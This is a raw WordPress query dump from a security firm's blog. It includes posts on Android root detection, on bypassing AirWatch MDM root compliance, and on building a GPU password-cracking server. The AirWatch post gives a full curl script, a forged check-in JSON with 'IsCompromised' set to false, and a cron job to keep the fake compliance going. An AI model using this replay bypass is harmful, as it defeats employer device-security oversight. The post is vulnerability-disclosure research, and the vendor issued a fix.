    tmpfs                   958500         0    958500   0% /mnt/secure
    tmpfs                   958500         0    958500   0% /mnt/asec
    tmpfs                   958500         0    958500   0% /mnt/obb

Conclusion

This is probably no where near a complete list, but it does show the many different ways root can be detected on Android devices. Blacklisting packages and binaries seems to be the simplest and most effective way to detect root. This is especially true if your device is running a stock ROM from Google that has been rooted like mine where the only difference is the addition of su and a couple packages. At some point in the future I would like to create an app that will provide all these checks before installing an MDM. I touch on bypassing AirWatch root detection in my blog here:  https://www.netspi.com/blog/entryid/192/bypassing-airwatch-root-restriction, however, AirWatch has made some changes so it may not work anymore depending on your environment. [post_title] => Android Root Detection Techniques [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => android-root-detection-techniques [to_ping] => [pinged] => [post_modified] => 2021-06-09 23:19:05 [post_modified_gmt] => 2021-06-09 23:19:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1137 [menu_order] => 730 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [12] => WP_Post Object ( [ID] => 1151 [post_author] => 7 [post_date] => 2013-08-15 07:00:07 [post_date_gmt] => 2013-08-15 07:00:07 [post_content] => Mobile devices are becoming more common in corporate environments. As a result, mobile device management solutions (MDM) have cropped up so that employers can remotely manage and wipe devices if necessary along with setting certain requirements that employees must comply with, such as setting a passcode, encrypting the device, and not jailbreaking or rooting the device. It’s certainly not a bad idea to enforce restrictions on devices that may contain sensitive information. However, bypassing some of the restrictions that an employer may put in place it not difficult. This is especially true if someone wants to keep their device rooted.  There are many contenders in the sphere of MDM software. For this blog I will be looking at AirWatch for Android. The device I will be using is a rooted Nexus 4 running Android 4.2.2. [Note Update at End of Post - 09.13.13]

Background

AirWatch is an MDM solution that provides employers with the ability to manage mobile devices and enforce policies. An agent is installed on the device and monitors whether the device is compliant or not for specific policies. If a device is found to be non-compliant, the agent phones home to a server, notifying the employer of a non-compliant device. Here is the default web interface for an AirWatch enrolled device. As you can see, my Nexus 4 is enrolled, is encrypted, and requires a passcode. However, it is still not compliant because my device has been “compromised,” i.e. rooted by myself. A poor word choice in my opinion. The same can be seen on the AirWatch agent. Bypass Airwatch Bypass Airwatch If we navigate to the compliance section, we can see why we are not compliant. Bypass Airwatch Again, the agent shows that we are encrypted, but our device is “compromised.”

Digging Deeper

At this point I want to know how AirWatch is detecting that my phone is rooted. I tried removing the su binary and any superuser applications, but that didn’t seem to work. As a rooted phone, we can certainly grab the apk of the agent and tear it apart. That only revealed obfuscated java classes that would take a while to decipher. Next, I tried running strace against the agent process to get an idea of the calls that it is making, hoping that there would be something there that reveals what it is doing to detect root. Again, there weren’t any answers that I could find. I decided to shelve looking for how AirWatch was detecting root for another day and instead I started focusing on the HTTP request and responses that the agent was sending and receiving. I started burp and setup a proxy on my Nexus 4. There is a fair amount of traffic that goes between the AirWatch agent and the server it’s talking to. One request in particular caught my eye. Bypass Airwatch This AirWatchBeacon checkin request. I omitted some of the more sensitive information in the request. As you can see there is an “IsCompromised” field in the request that is set as true. So I change that to false and sent the request off. After refreshing the web interface, my device is no longer compromised. Bypass Airwatch The agent also shows that my device is no longer compromised. Bypass Airwatch So now we know how the agent is checking into the server and whether or not your device is compromised. By changing a simple flag, we now control that. Furthermore, there doesn't seem to be any type of session information related with the request. We can replay the same request hours, even days later, and the server will accept it. The only downside now is that the agent will periodically do a check-in request with the server and report that the device is compromised. It’s a hassle to send a non-compromised request every time we want to be compliant. The first step I took in resolving this issue was to look at the AirWatch configuration options in its SQLite database. Using the SQLite Editor app from the Android market, I open up the AirWatch database with root access. Bypass Airwatch Selecting the AirWatch database reveals a number of interesting tables. Bypass Airwatch The profileGroupSetting table is where most of the AirWatch configurations are stored. Bypass Airwatch There are a few rows that look interesting. The ones that contain interval in the name seem to set how often the AirWatch requests are sent. I tried changing the BeaconInterval to large values to see if it would take longer for the check in requests to be sent. That didn't seem to work. Neither did setting the value to zero or a negative value. For the most part, setting the interval values do not seem to do anything in my testing. There is, however, another way to stop AirWatch from sending out request. Modifying the Android hosts file to block the host that the requests are being sent to. The Android hosts file is located in /system/etc/. Again, you have to be root to be able to modify the hosts file. I modified the hosts file to redirect the requested host to my localhost. The requested host is going to be different for every company, so I won’t be showing that. It’s been well over a week and my device has still not checked in and still shows that I’m compliant. The only downside to not checking in often is that your device will show as not being seen for sometime. You employer may have a policy in place to remove devices that AirWatch shows as being inactive. One way to mitigate this is to periodically send out the checkin request yourself. Simply setting up a cronjob with curl to send out the checkin request work very well.
#!/bin/bash
 
curl -X POST -d @request https://host/DeviceServices/AirWatchBeacon.svc/checkin -H "Content-Type: application/json" -H "User-Agent: AirWatch Agent/4.0.401/Android/4.2.2" -H "Host: host"
Here is the json POST request data the curl command uses for –d @request:
{"payLoad":{"FriendlyName":"Android_sdNexus 4_353918050698915","Model":"Nexus 4","CustomerLocationGroupRef":"YourGroup","PhoneNumber":"1111111111","DeviceType":5,"C2dmToken":"APA91bHcoJnegJy23fPaa2Fg2miP0vJEuC9aVcAw9iuwKb8AQcnzr7OyiXShrJSGD_AajBPUwuSm4Y_gcuz3ibnnjfbfpkLnAnoF599IM2yZhTVaUq0XWLKFfNP11oYzIavq4OjTO5DH4y3XpkvWmQBD16qkFJEg1BFFuOA2y1SJo6aE2yILIIo","IsCompromised":"false","OsVersion":"4.2.2","SerialNumber":"1111111111","Name":"Google occam","MacAddress":"ff:ff:ff:ff:ff:ff","DeviceIdentifier":"1111111111111","AWVersion":"4.0.401","TransactionIdentifier":"a8098ea5-a54e-412f-a911-a58920a24dc7"}}
Finally add the bash script to your crontab by running “crontab –e” to edit the crontab and add the following at the end of the file:
0 */2 * * * /root/command.sh
This will cause the script to run every two hours.

Conclusion

MDM solutions are great for employers to manage mobile devices. However, they are not without their problems. Not only was I able to bypass compliance for having a rooted device, but I was also able to bypass the need to encrypt my device from the profileGroupSetting table. Bypassing compliance restrictions for AirWatch is relatively trivial after a few hours and I’m sure it is probably similar with many others MDM solutions.

Update - 09.13.13

Eric Gruber: AirWatch states that it has addressed this issue by recommending that clients enabled a security configuration setting called "secure channel" which according to AirWatch protects against Man-In-The-Middle attacks by using mutual X.509 message-level certificate signing and encryption between the client and the server. For AirWatch hosted customers, this options is now enabled by default and cannot be disabled. [post_title] => Bypassing AirWatch Root Restriction [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypassing-airwatch-root-restriction [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:05 [post_modified_gmt] => 2021-06-08 21:48:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1151 [menu_order] => 744 [post_type] => post [post_mime_type] => [comment_count] => 23 [filter] => raw ) [13] => WP_Post Object ( [ID] => 1164 [post_author] => 7 [post_date] => 2013-04-15 07:00:07 [post_date_gmt] => 2013-04-15 07:00:07 [post_content] => Last week Karl Fosaaen described in his blog the various trials and tribulations we went through at a hardware level in building a dedicated GPU cracking server. This week I will be doing a complete walkthrough for installing all the software that we use on our box. This includes the operating system, video drivers, oclHashcat-plus, and John the Ripper. Because we have AMD video cards, the driver installation and compiling John the Ripper sections will be tailored for AMD, sorry Nvidia users.

Installing the OS:

For an operating system, Linux and Windows are going to be the way to go. For a headless server however, Linux is the best way to go. The only downside with Linux is that driver support among video cards, especially AMD, is somewhat lacking to its Windows counterpart. However, the good news is that both AMD and Nvidia have been increasing their support for Linux drivers in recent years. Any Linux distribution will do, but for our server, we opted for Ubuntu 12.10 64-Bit server edition to do the most minimal setup. Much of the information for the next few sections is from the hashcat wiki. To start off, download the Ubuntu 12.10 server edition ISO from Ubuntu. We don’t have a cd drive on our server, so we had to copy the ISO to a flash drive. YUMI and UNetbootin make this process painless on Windows and Linux, respectfully. Otherwise, the ISO can be burned to a disc. Boot up the Ubuntu image, choose your language, and select Install Ubuntu Server.

Img E D

Navigate through the installation options and select your preferences. For most people, the defaults should be sufficient. Then create your user when the dialog comes up. When the installation reaches the “Partition Disks” section, either manually set them up (if you know what you’re doing) or just use the “Guided – use entire disk” option. We choose not to use LVM on our box, but the option is up to you.

Img E Eb A

After you are done partitioning your hard drive, write the changes to the disc. If you have an HTTP proxy, enter the information when the dialog appears. If not, then just continue. Next, select if you would like to have automatic updates enabled. We opted not to, but it’s entirely up to you. When the software selection appears, select OpenSSH server by navigating to it with the arrow keys and pressing spacebar to select the option.

Img E E A

None of the other packages are required unless you need them. Press enter to install the software. When the installation is finished, install GRUB to the master boot record and reboot. You should now be booted into your new Ubuntu server!

Setting Up Ubuntu:

Before we install the video drivers, we have to setup our Ubuntu server with X11. This is because the AMD drivers require X11 to interact with video cards to obtain fan speeds and GPU temps, which are very important to know when cracking away. To begin, ssh into your server and update Ubuntu with the following command:
sudo apt-get update && sudo apt-get upgrade
After Ubuntu has updated, we will need to install a minimal X11 environment that our user can automatically login to when the server is rebooted. This is to ensure that the xserver will always be running and in turn allow continuous cracking without any hiccups. To keep it simple, a light weight window manager is recommend. Openbox, fluxbox, and blackbox are three simple light weight window managers that we can use. You are by no means restricted to a window manager. If you want gnome, xfce, or kde, those can be installed too. For this installation, we will install fluxbox with lightdm as the display manager. To install these, run the following command:
sudo apt-get install fluxbox lightdm-gtk-greeter x11-utils
This should install all the necessary packages for an X11 environment to run. Now that we have an X11 environment installed, we need to let applications from the console know which display we are using. To do this, we set the DISPLAY variable to our current display. The format for the DISPLAY variable is hostname:display. For a local instance, the hostname can be omitted. The default display is usually going to be 0. Run the command below to set your current display to 0.
export DISPLAY=:0
Add the above command to your bashrc to make it persistent whenever your user logs in. I have run into many issues because I did not have this set. So make sure your bashrc is setup with your correct display location. Now that our X11 environment is setup, we can install the AMD drivers.

Installing AMD Drivers:

To begin installing the AMD drivers, we need to install some prerequisites. First install unzip with the following command
sudo apt-get install unzip
Next, we need to install the dependencies for fglrx, which is the proprietary Linux driver for AMD on Ubuntu’s repositories. The only difference between fglrx and AMD’s Catalyst drivers is that the latter is newer, but they both require the same dependencies. Run the following command to install the fglrx dependencies:
sudo apt-get build-dep fglrx
If the fglrx dependencies are not installed, the AMD driver installation will fail with this fglrx error:

Img E A C B

Now we can grab the latest version of the AMD Catalyst drivers from the AMD Catalyst™ Proprietary Display Driver page. The latest version at this time is 13.1. It should also be noted that oclHashCat-plus requires a specific version of Catalyst installed, which at this point is 13.1. So we’re good there. Fetch the AMD driver with wget and then unzip it:
wget https://www2.ati.com/drivers/linux/amd-driver-installer-catalyst-13.1-linux-x86.x86_64.zip
unzip amd-driver-installer-catalyst-13.1-linux-x86.x86_64.zip
There should now be a .run file in the directory. Execute the file while running as root.
sudo sh amd-driver-installer-catalyst-13.1-linux-x86.x86_64.run
Select the default options on all the dialog boxes and let the driver install. After it is done, create a new xorg.conf by running:
sudo amdconfig --adapter=all --initial -f
Then we are going to setup our user to automatically login to fluxbox when the server boots up. Open the lightdm.conf file in /etc/lightdm/ as root and add the following lines:
[SeatDefaults] greeter-session=lightdm-gtk-greeter user-session=fluxbox autologin-user=USER autologin-user-timeout=0
Reboot the server and your user should be automatically logged into fluxbox. When the server boots up run
amdconfig --list-adapters
and
amdconfig --adapter=all --odgt
to verify that all your cards and their temperatures can be seen.

Img E A D D

Now that the AMD drivers are installed, we can install our cracking software.

Installing oclHashcat-plus

Download the latest oclHashcat-plus. We will just wget the latest version to our box.
wget https://hashcat.net/files/oclHashcat-plus-0.14.7z
oclHashcat-plus comes in a 7z format. So we need to install p7zip to extract it.
sudo apt-get install p7zip
Run p7zip with the –d flag to extract a 7z file.
p7zip -d oclHashcat-plus-0.14.7z
Navigate to the newly extracted ocl directory and run one of the Example.sh scripts to test run the cracking process.

Img E B F

If all goes well you should see your cards loading up and the hash getting cracked! If you do not see all your cards being recognized, make sure that your xorg.conf was created properly. Try running the amdconfig command above again to regenerate an xorg.conf. Next we will install John the Ripper with OpenCL support

Installing John the Ripper

Like oclHashcat-plus, John also supports cracking hashes on GPUs, but it must be compiled with the options to do so. Much of the information here is taken from the john GPU wiki (https://openwall.info/wiki/john/GPU). First download the Accelerated Parallel Processing SDK from AMD. 32 bit and 64 bit are supported, so make sure you download the correct one for your architecture. Copy the file to your server with scp or if you’re on Windows, WinSCP. Next, extract the APP SDK file.
tar xvf AMD-APP-SDK-v2.8-lnx64.tgz
Then run the Install-AMD-APP.sh as root.
sudo ./Install-AMD-APP.sh
Reboot the server. After the APP SDK has been installed, download the latest version of John. We will be using the jumbo version.
wget https://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
Extract john with the following command:
tar xvf john-1.7.9-jumbo-7.tar.gz
Next, install the libssl-dev package from apt-get so that John compiles correctly.
sudo apt-get install libssl-dev
Navigate to the john src directory. Compile john with OpenCL for either 32 bit or 64 bit with
make linux-x86-opencl
and
make linux-x86-64-opencl
respectfully. John can also be compiled with CUDA support if you have Nvidia cards. The information on how to do that is located on their wiki. If you get openssl headers not found during compilation, install the libssl-dev package. Navigate back to the run directory and your newly compiled john binary should be there. You can test that John can use your GPUs by running a test command.

Img E Beaa B

Conclusion

This is guide details one of many possible setups for a GPU cracking server. When all is done, our cracking server built with these specifications works very well. In Karl’s blog here, he describes common ways to obtain hashes to crack on Windows, Linux, and web applications. [post_title] => GPU Cracking: Setting up a Server [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-setting-up-a-server [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:50:18 [post_modified_gmt] => 2021-06-08 21:50:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1164 [menu_order] => 757 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [14] => WP_Post Object ( [ID] => 1172 [post_author] => 7 [post_date] => 2013-03-05 07:00:17 [post_date_gmt] => 2013-03-05 07:00:17 [post_content] => WSDL (Web Services Description Language) files are XML formatted descriptions about the operations of web services between clients and servers. They contain possible requests along with the parameters an application uses to communicate with a web service. This is great for penetration testers because we can test and manipulate web services all we want using the information from WSDL files. One of the best tools to use for working with HTTP requests and responses for applications is Burp. The only downside with Burp is that it does not natively support parsing of WSDL files into requests that can be sent to a web service. A common work around has been to use a tool such as Soap-UI and proxy the requests to Burp for further manipulation. I’ve written a plugin for Burp that takes a WSDL request and parses out the operations that are associated with the targeted web service and creates SOAP requests which can then be sent to a web service. This plugin builds upon the work done by Tom Bujok and his soap-ws project which is essentially the WSDL parsing portion of Soap-UI without the UI. The Wsdler plugin along with all the source is located at the Github repository here: https://github.com/NetSPI/Wsdler.

Wsdler Requirements

  1. Burp 1.5.01 or later
  2. Must be run from the command line

Starting Wsdler

The command to start Burp with the Wsdler plugin is as follows: java -classpath Wsdler.jar;burp.jar burp.StartBurp

Sample Usage

Here we will intercept the request for a WSDL file belonging to an online store in Burp.

Img B Ce B E

After the request for the WSDL has been intercepted, right click on the request and select Parse WSDL.

 Img B Ce Aca

A new Wsdler tab will open with the parsed operations for the WSDL, along with the bindings and ports for each of the operations. Operations are synonymous with the requests that the application supports. There are two operations in this WSDL file, OrderItem and CheckStatus. Each of these operations has two bindings, for simplicity’s sake, bindings describe the format and protocol for each of the operations. The bindings for both of the operations are InstantOrderSoap and InstantOrderSoap12. The reason there are two bindings for each of the operations is because the WSDL file supports the creation of SOAP 1.1 and 1.2 requests. Finally, the ”Port” for each of the operations is essentially just the URL the request will be sent to. The full specification for each of the Objects in WSDL files can be read here: https://www.w3.org/TR/wsdl.

 Img B Ce

The SOAP requests for the operations will be in the lower part of the Burp window. The parsing functionality will also automatically fill in the data type for each of the parameters in the WSDL operation. In this example, strings are filled in with parts of the Aeneid and integers are filled in with numbers. The request that Wsdler creates is a standard Burp request, so it can be sent to any other Burp function that accepts requests (intruder, repeater, etc.). Here the request is sent to intruder for further testing. Because the request is XML, Burp automatically identifies the parameters for intruder to use.

Img B Ceb D

Img B Cebcc B

Conclusion

Currently, the plugin only supports WSDL specification 1.1, but there is work on supporting 1.2 / 2.0. Also, I will be adding the option to specify your own strings and integers when the plugin automatically fills in the appropriate data type for each of the parameters in the parsed operations. If there are any bugs or features that you would like to see added, send me an email or create a ticket on Github. [post_title] => Hacking Web Services with Burp [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-web-services-with-burp [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:45:33 [post_modified_gmt] => 2021-06-08 21:45:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1172 [menu_order] => 766 [post_type] => post [post_mime_type] => [comment_count] => 38 [filter] => raw ) ) [post_count] => 15 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 27398 [post_author] => 53 [post_date] => 2022-02-21 12:52:03 [post_date_gmt] => 2022-02-21 18:52:03 [post_content] =>

Security leaders today are experiencing change at a rate like never before. Whether they’re going through an acquisition, deploying a remote workforce, or migrating workloads to the cloud, change is inevitable and unknown assets are sure to exist on your network.

Detecting and preventing the unknown is no easy task. But what you don’t know can hurt you. So, how can we identify vulnerable exposures before adversaries do?

It’s time for organizations to master the art of attack surface management. How? By implementing a human-first, continuous, risk-based approach.

In this webinar, participants will learn:

  • What is attack surface management?
  • How cyber attack surface management fits into broader enterprise-wide vulnerability management efforts
  • How to improve your attack surface visibility with continuous penetration testing
  • Why a human-first approach is the future of attack surface monitoring
  • An introduction to NetSPI’s Attack Surface Management (ASM) solution and our ASM Operations Team
[post_title] => Mastering the Art of Attack Surface Management [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-art-of-attack-surface-management [to_ping] => [pinged] => [post_modified] => 2023-09-20 11:12:35 [post_modified_gmt] => 2023-09-20 16:12:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=27398 [menu_order] => 47 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 15 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => 3a9d9e7c7a39ac5fa8569b1408b00f2a [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X